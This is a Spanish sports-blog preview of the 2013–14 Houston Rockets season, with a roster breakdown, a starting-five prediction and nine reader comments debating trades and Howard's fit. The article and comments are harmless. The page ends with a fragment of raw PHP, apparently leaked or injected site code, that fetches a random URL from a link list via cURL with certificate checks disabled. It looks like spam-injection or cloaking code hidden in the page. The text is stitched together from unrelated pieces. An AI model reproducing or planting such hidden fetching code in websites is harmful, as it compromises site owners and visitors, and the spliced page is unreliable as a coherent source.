Houston Rockets: ¿Preparados para el despegue?

22 de October de 2013 por Simon

Tras una temporada en la que prácticamente todo salió  a pedir de boca, este verano  los Rockets han dado un pasito más en su reconstrucción exprés y se han traído al que para muchos es el mejor pívot de la competición. Dwight Howard llega a Houston para, supuestamente, convertirlos en candidatos a todo desde el primer momento aunque a mi la plantilla me parece todavía muy pobre para optar al título de verdad. A excepción del movimiento de Howard, Daryl Morey no ha sido capaz de reforzar al equipo en ninguna otra faceta, aunque no descarten que los movimientos se produzcan durante el transcurso de la temporada porque poseen varios activos interesantes.

A pesar de todas las noticias y rumores que han surgido durante el verano, Jeremy Lin volverá a ser el base titular del equipo. Casi todo el mundo desconfía de que pueda ser capaz de dirigir a sus compañeros pero sobretodo de abastecer de balones al recién llegado. El año pasado dejó algunas dudas sobre su rendimiento pero en mi opinión esas dudas vienen de los “iluminados”  que lo veían como el próximo base estrella de la liga. Si lo consideramos en su justa medida, como base promedio, creo que cumplió  más que de sobra con su papel. Seguro que esta temporada, alejado de los focos y todo ese hype que le rodeaba el pasado año  podrá  concentrarse exclusivamente en jugar y ayudar a Houston a dar ese pasito. Su suplente será Patrick Beverley, más conocido por lesionar a Westbrook, aunque lo cierto es que dejó muy buenas sensaciones en su temporada rookie. Puede robarle bastantes minutos a Jeremy Lin gracias a su buena defensa, velocidad y buena mano desde lejos. En esta posición también tendrán minutos Aaron Brooks que actualmente está muy lejos de ser aquel que maravilló en 2010 en estos mismos Rockets. Si fuera capaz de recuperar una versión parecida a la de aquella temporada los Rockets subirían muchos enteros en la conferencia. En nómina también está el rookie Isaiah Canaan cpn perfil muy parecido al de rooks. Base pequeño con un gran tiro de larga distancia. 

El puesto de escolta titular será para el All-Star James Harden, el principal artífice de la resurrección de los Rockets el año pasado. Para muchos ya es el mejor escolta de la liga y así debe actuar. Su capacidad para anotar y su buena visión de juego están fuera de toda duda. En su debe, su escaso rendimiento defensivo y la facilidad que tiene para perder el balón. De cómo se entienda con Howard dependerá el techo de los Rockets esta temporada. Los minutos que deje Harden los utilizarán Francisco García y Reggie Williams, dos jugadores que comparten virtudes y defectos. Ambos son grandes tiradores de tres puntos y buenos jugadores a campo abierto, pero fuera de ahí su aportación es bastante escasa pues ninguno es un buen defensor ni posee una visión de juego que les permita aportar en otras facetas.

El alero será Chandler Parsons, que afrontará  su tercera campaña en la liga con la intención de consolidarse como uno de los mejores aleros de la competición. Es de esos jugadores que no destaca en ninguna faceta en particular pero que es capaz de hacer de todo y todo bien. Casi siempre toma la opción más inteligente, saca muchos puntos fáciles y es un buen defensor. Su altura le permitirá  jugar a ratos de 4 si es necesario.  Este año también ha llegado al equipo Omri Casspi, otro buen tirador de tres puntos que dejó muy buenas sensaciones en Sacramento Kings en sus primeras temporadas para después perder efectividad y protagonismo en Cleveland. Como especialista defensivo del equipo actuará Ronnie Brewer, uno de los defensores exteriores más destacados de la liga, que ejercerá de stopper de la estrella rival si es necesario. En sus primeros años en la liga, en Utah Jazz, también aportaba en ataque gracias a su explosividad y agresividad pero esa aportación se ha ido desvaneciendo desde que abandonó el equipo mormón. No obstante nadie le pedirá responsabilidades ofensivas si no que se centre en su defensa. Para cerrar la batería de exteriores tenemos a Robert Covington, que se ganó su contrato tras una buena summer league. En  la NCAA jugaba de ala-pívot pero su escasa altura (2,02) le impedirá jugar muchos minutos en esa posición. Es otro jugador capaz de lanzar con acierto desde lejos y podría tener algún minuto si demuestra que es un tirador certero a este nivel y Houston se decide por un small-ball.

Mucho se ha hablado de la posibilidad de que Asik y Howard jueguen juntos pero la verdad es que no vemos la forma de cómo pueden encajar ambos en pista de manera que no se estorben y entorpezcan el juego de su equipo. De momento, vamos a colocar como titular a Terrence Jones. Es algo bajo para ser un ala-pívot (2.03) pero su versatilidad, capacidad de crear su propio tiro y su buena defensa le abren la puerta de la titularidad ante Donatas Motiejunas. El lituano está cuajando una buena pretemporada gracias a los muchos recursos en ataque que posee pero al que aún le falta consistencia para aportar con regularidad. Su flojo desempeño defensivo creo que es lo que va a decantar la balanza a favor de Jones para la titularidad. No obstante a Motiejunas podría venirle bien jugar con la segunda unidad y tener más protagonismo ofensivo y facilidad para crear con el balón desde el poste bajo que es lo que mejor se le da. La irregularidad y juventud de los dos ala-pívots puros del equipo seguramente dará lugar a que muchos minutos veamos small-ball en Houston con alguno de los aleros altos como Casspi o Parsons desempeñando la función de 4. En momentos puntuales podremos ver a alguno de los pívots del equipo como Asik, Camby o Smith desempeñarse como ala-pívot también.

En la posición de pívot llegamos a la gran novedad y esperanza de Houston para luchar por todo. Dwight Howard llega después de decepcionar a todo el mundo en los Lakers. Sus números no bajaron demasiado en Los Angeles pero su estatus en la liga ha disminuido notablemente, ya no es, indiscutiblemente, el mejor pívot de la liga. A pesar de seguir siendo uno de los mejores defensores ya no crea ese pánico que aterrorizaba a los exteriores rivales a la hora de penetrar ante sus Magic. En los Rockets la presión será distinta a la que se tenía que enfrentar en los Lakers. Aquí, “alejado” de los focos, debe recuperar su mejor versión, la de mejor defensor de la liga. En Houston han fichado fijándose un poco en el esquema que lo encumbró en Orlando, rodeándolo de tiradores altos para desarrollar muchos minutos un juego con 4 exteriores acompañándolo. Su suplente, si no compañero en la pintura, será Omer Asik, que tras su buena temporada ha pasado a la sombra tras este mediático fichaje. Podría crear una pareja brutal con Howard en defensa pero en ataque son 2 jugadores totalmente incompatibles pues ninguno es capaz de alejarse más de metro y medio del aro si quiere ser efectivo. Llegados a este punto creo que la mejor opción para ambos es que el pívot turco salga traspasado. Otro jugador que puede ver mermada su progresión con el overbooking actual de pívots en Houston es Greg Smith  que fue una de las gratas sorpresas de la temporada pasada aportando 15/20 minutos de mucha calidad por noche cubriendo las espaldas al pívot titular. Para colmo, Houston ha fichado a Marcus Camby que, aunque venido a menos por la edad y  continuas lesiones, ha atesorado una gran experiencia y sigue siendo un buen defensor. Con semejante competencia en el puesto no creo que tenga ningún protagonismo aunque es de esos jugadores que siempre preferiría tener en mi equipo.

Como hemos visto, Houston es un equipo calcado al del año pasado cambiando la presencia del Dwight Howard por la de Omer Asik como pívot titular lo cuál debería ya ser una mejora de por sí. Sus bases ofrecen dudas en cuanto a la capacidad de dirección y para el banquillo prácticamente todo lo que se ha añadido han sido jugadores del mismo perfil: tiradores a pie firme. Sacando a Harden y ¿Howard? no veo a ningún jugador capaz de crearse su propio tiro en ataque con regularidad. Para colmo la mayoría de sus jugadores dejan mucho que desear en defensa por lo que el estilo no debe cambiar mucho respecto al del pasado año. Mucha velocidad y puntos rápidos a pesar de contar con Howard, pues no tienen otra opción si quieren sorprender al equipo rival. Este sistema les valdrá para ganar muchos partidos en la regular pero llegados los Play Off sufrirán si no son capaces de añadir al menos un par de piezas que les den un enfoque distinto al juego y nuevos alternativas. Otra opción es que los jóvenes como Motiejunas o Jones explotaran dando un nuevo nivel al equipo pero aún así no creo que jugadores tan jóvenes vayan a darle ese plus necesario al equipo para luchar por el título a corto plazo. Todo esto podría cambiar si su General Manager, Daryl Morey, se saca otro conejo de la chistera y es capaz de añadir todo lo necesario a cambio de Omer Asik que debe ser un pívot muy cotizado gracias a su buen balance precio/rendimiento.

Quinteto titular: Jeremy Lin, James Harden, Chandler Parsons, Terrence Jones, Dwight Howard.
Sexto hombre: Omer Asik, por decir alguno, puesto que ninguno de sus suplentes los veo capacitados para dar un aporte extra desde la banca.

Pronóstico: Unas 50/52 victorias. Cuartos o quintos del Oeste. Su tope será segunda ronda aunque los veo cayendo a las primeras de cambio.

Comenta

9 comentarios a esta entrada

  1. franitis dice:
    #1

    A mí sí me parece un equipo completo, que va a dar mucha guerra en la liga y posiblemente pueda llegar más lejos en PO que una primera o segunda ronda. Howard, salido de LAL y una vez dejada atrás su lucha de egos con Kobe, de la que salió claramente mal parado, va a recuperar la confianza en sí mismo y seguro que va a recuperar ese poder intimidatorio en defensa, lo que va a dar un plus a este equipo.

    Parsons personalmente me parece una pasada, como bien comentas, hace de todo y bien, lo que junto con Linsanity y Harden hacen un quinteto temible junto con Howard y sea quien sea el que juegue de 4, que en la lista de PF y C también los veo bien cubiertos (aún contando con la posible salida de Asik).

    Podrían pensar en un SG completito como sexto hombre, con buena capacidad defensiva en el cambio por Asik, que pudiese jugar por Harden o Parsons. Han perdido a Delfino, pero conservan a Fco. García, que también aporta lo suyo. ¿Un cambio con OKC por Sefolosha? A OKC les vendría bien un Center en condiciones y Sefolosha aportaría desde la segunda unidad…

      Citar

  2. Viva_Dirk dice:
    #2

    Desde luego para ser un equipo aspirante necesitan que Howard se centre en jugar. Una vez consigan eso el techo para mi lo pone el nivel que pueda dar Terrence Jones a su lado. Si lo vemos explotando todo su físico y capaz de anotar tiros de media y larga distancia los Rockets se convierten en un equipo peligrosísimo, pero si pueden centrar la defensa interior en Howard tendrán muchos problemas. Yo confio en el y creo que Houston puede pelear la conferencia.

    Luego hacer un buen movimiento con Asik sería muy importante también, Sefolosha se me queda algo corto, pero hay bastantes equipos que necesitan un center y podrian dar buenas piezas para esta plantilla.

      Citar

  3. rumbero dice:
    #3

    Un Asik – Anderson parece de manual. Les vendría bien a ambos equipos. Y si no hay movimientos creo que le sigue quedando un equipo suficientemente majo como para dar algun que otro susto en PO. Harden y Howard a tope es mucha tela.
    A mi también me gusta mucho Parsons, un tio tremendamente versátil que les viene de lujo, y también soy de los que cree que Beverley le acabará robando minutos a Lin a poco que conecte bien con Dwight. A nível defensivo le da un gran plus al equipo.

      Citar

  4. Luis H. dice:
    #4

    Parsons, Beverley y Lin son capaces de crear su propio tiro. Motiejunas y Terrence Jones no son ofensivamente mancos. Hay material para producir ahí. En defensa, tienen tres que aportan bastante en Beverley, Howard y Parsons. Si Harden y Jones alcanzan un buen nivel, ojito al parche

      Citar

  5. HisRoyalAirness dice:
    #5

    Pues ya que tanto se habla de Doc Rivers y de que va a convertir a Griffin y Jordan en defensores y ganadores (??) Me gustaría sacar a la palestra el nombre de Kevin Mchale, perro viejo, ganador y, en mi opinión, grandísimo entrenador. Para cualquiera de los interiores es un absoluto lujo poder aprender los fundamentos de uno de los mejores 4 de todos los tiempos e integrante del mejor frontline que ha existido.
    Tienen mimbres de sobra para pelear con cualquiera, salvo contra buenos ala-pivots rivales con cierta altura, y ahí está el problema en el Oeste.

    Pero yo confío en Mr. McHale

      Citar

  6. Denise dice:
    #6

    Le falta algo de banquillo pero aun así creo que tienen equipo para hacerse con el anillo si Howard volviese al nivel de 4 años.
    Respecto al PF titular, creo que Greg Smith le comerá la tostada a Terrence Jones, el cual parece que no anda muy bien de cabeza.

      Citar

  7. Esteban dice:
    #7

    la verdad, estan muy carentes en muchas posiciones

    la base es de buena tirando a regular; lin parece haber alcanzado su techo y no lo veo como un base al que le daria la responsabilidad e comandar las ultimas jugadas en finales cerrados de partidos de final de la nba

    el puesto de 4 deja aun mas que desear, tanto jones como montiejunas me parecen tremendos prospectos de jugadores, pero para eso creo que hubiesen necesitadio ambos mas minutos el año pasado y no se los dieron
    darles tanta responsabilidad es hacerlos crecer de golpe, no me parece bien

    y en cuanto a la banca, sacando a asik obviamente, el resto no van a ayudar a dar vuelta un juego, de hecho carecer hasta de un anotador confiable

    el trade asik por anderson tiene muchisimo sentido

      Citar

  8. r_miller dice:
    #8

    Voy a decir en voz alta: que Kobe Bryant sigue siendo el mejor escolta!!!! Esa enfermedad que tiene kobe que se llama intensidad Harden no la tiene ni que jugara una final NBA, como ya pasara el año pasado donde desaparecio. Va a ser un all-star unos años pero no va a pasar de una escopeta ya que ahora es la edad de los bases y los aleros (Chris Paul-Curry-Irving-Rose/ Lebron-Durant-Carmelo-Leonard-Harrison Barnes- Rudy Gay) los escoltas estan pasando desapercividos salvo la Leyenda de Kobe y Harden en un equipo de mantas que es el que tenian el año pasado y no saben como ganaron partidos a los Thunder en los play-offs. Howard no va a aportar mucho mas que lo que hacia Asik, que va a hacer 5 puntos mas y 2 rebotes, para eso sigues con Asik y no lo dejas en el banquillo cobrando 10 millones. Wade se apaga por propia voluntad y gente como Monta Ellis y OJ Mayo no dan lo que deberian por una razon, los escoltas ya no sirven para nada mas que tirar de vez en cuando, pero salvo como he dicho, leyendas como Kobe y Wade no hay nadie mas que pueda llevar a un equipo al campeonato y menos Harden.

      Citar

  9. GreenPride dice:
    #9

    Quizás el equipo más incógnita de entre los que contamos con aspiraciones a todo este año. En principio tienen dos grandes estrellas complementados por un grupo de muy buenos jugadores pero hay que ver cómo funcionan.
    Está claro que su punto débil el año pasado era la defensa y eso es lo que debe mejorar más con Howard en cancha. Debe volver a ser el de Orlando y conseguir intimidar a todo el que entre en la zona de los texanos. Si lo consigue y el resto se ponen las pilas en este aspecto Houston puede luchar incluso por la conferencia. En ataque tienen un equipo con muchas posibilidades. Harden es un gran pasador y Howard debe utilizar esto en su propio beneficio sobre todo en el pick%roll y las continuaciones. Además poseen una buena batería de tiradores por lo que pueden jugar abriendo campo para Howard y aprovechando cuando éste doble los balones hacia el exterior. Como todos, yo creo que al final llegará un traspaso por Asik pero más que hacia el exterior yo intentaría conseguir un cuatro que juegue abierto y estoy con vosotros en que lo de Anderson sería muy bueno para ambos equipos.
    Yo estoy espectante y espero que el bueno de McHale sepa sacar el rendimiento que Howard no dio en LA. Si lo consigue veo a los Rockets tan preparados casi como cualquier otro equipo del Oeste para luchar por ir a las finales

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>